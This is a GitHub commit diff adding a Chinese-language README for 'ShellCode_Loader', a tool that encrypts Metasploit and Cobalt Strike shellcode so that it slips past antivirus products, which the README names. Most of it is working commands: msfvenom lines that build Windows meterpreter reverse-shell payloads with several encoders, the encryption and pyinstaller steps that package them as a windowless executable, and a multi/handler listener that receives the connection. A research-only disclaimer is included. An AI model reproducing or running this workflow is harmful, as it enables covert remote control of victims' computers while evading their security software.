Skip to content

Commit 5c8f789

Browse files
authored
Update README.md
1 parent eb3b49f commit 5c8f789

File tree

1 file changed

+97
-2
lines changed

1 file changed

+97
-2
lines changed

README.md

Lines changed: 97 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,108 @@
1+
# ShellCode_Loader
12

3+
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。
24

3-
# 临时删除 以后会发布
5+
# 声明
46

7+
该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!
8+
代码未经过大量测试,如发现问题请提交 issue。
59

10+
# 测试环境
611

12+
截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)
713

14+
Windows 7 64位 或以上操作系统应该都没问题(没有测试)
815

16+
# 生成Msf_Payload
17+
18+
### 默认
19+
20+
```
21+
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload.c
22+
23+
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f py -o  payload_py.c
24+
```
25+
26+
### XOR 编码器
27+
28+
```
29+
msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload_xor.c
30+
```
31+
32+
### 动态密钥XOR编码器
33+
34+
```
35+
msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload_xor_dynamic.c
36+
```
37+
38+
### Zutto Dekiru
39+
40+
```
41+
msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload_zutto_dekiru.c
42+
```
43+
44+
# 生成CobaltStrike_Payload
45+
46+
![图片](https://user-images.githubusercontent.com/34683107/188174674-0761d510-264f-47b0-85ea-be5566c0d3f1.png)
47+
48+
选择使用x64的C语言或Python语言的Shellcode。
49+
50+
![图片](https://user-images.githubusercontent.com/34683107/188174724-ddbe398b-d378-4336-a79a-6a7e406659a4.png)
51+
52+
得到一个payload.c的文件
53+
54+
内容为:
55+
56+
![图片](https://user-images.githubusercontent.com/34683107/188178026-bd171622-6f6e-4568-af43-e2d49755220c.png)
57+
58+
# 加密Payload
59+
60+
```
61+
Shellcode_encryption.exe    payload.c
62+
```
63+
64+
![图片](https://user-images.githubusercontent.com/34683107/188175988-d1de1fba-d7ea-4349-acf4-1c7de44d6ad7.png)
65+
66+
# 配置ShellCode加载器
67+
68+
将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode' 处
69+
示例:
70+
![图片](https://user-images.githubusercontent.com/34683107/188174998-22cdbaa6-80b2-457b-bfd1-0419ca0816c4.png)
71+
最终格式:
72+
![图片](https://user-images.githubusercontent.com/34683107/188175071-d1396239-5f8f-4fdb-b750-80e2ac6fabd1.png)
73+
74+
# 打包可执行程序(EXE编译环境)
75+
76+
Python 3.8.6
77+
78+
pyinstaller 4.7
79+
80+
```
81+
pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
82+
pyinstaller -F -w ShellCode_Loader.py
83+
```
84+
85+
生成ShellCode_Loader.exe在dist目录中
86+
87+
# 上线测试
88+
89+
## 运行监听
90+
91+
```
92+
msfconsole
93+
msf6 > use exploit/multi/handler
94+
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
95+
msf6 exploit(multi/handler) > set lhost 0.0.0.0
96+
msf6 exploit(multi/handler) > set lport 8080
97+
msf6 exploit(multi/handler) > run
98+
```
99+
100+
![图片](https://user-images.githubusercontent.com/34683107/188175266-31ca4e0b-bb8a-4863-a958-065330c500af.png)
101+
![图片](https://user-images.githubusercontent.com/34683107/188175368-ab9d2f0f-2f92-42ca-b8d6-6980d84d3e51.png)
102+
帮忙点个Star 谢谢
9103

10104
# 参考链接
105+
11106
https://mp.weixin.qq.com/s/M3tbE08ybD_lIrJS8FtPTw
12107

13108
https://mp.weixin.qq.com/s/jMHn4trtMjgdSIsRmoVOtw
@@ -19,5 +114,5 @@ https://mp.weixin.qq.com/s/VS_c3QClxmCB6raXEfljpg
19114
https://mp.weixin.qq.com/s/4pwbdK6zz4XH7YJxCoA1Lw
20115

21116
# 感谢阅读
22-
![图片](https://user-images.githubusercontent.com/34683107/188175429-58a71c93-a603-408f-ac9b-c0b616b6467c.png)
23117

118+
![图片](https://user-images.githubusercontent.com/34683107/188175429-58a71c93-a603-408f-ac9b-c0b616b6467c.png)

0 commit comments

Comments
 (0)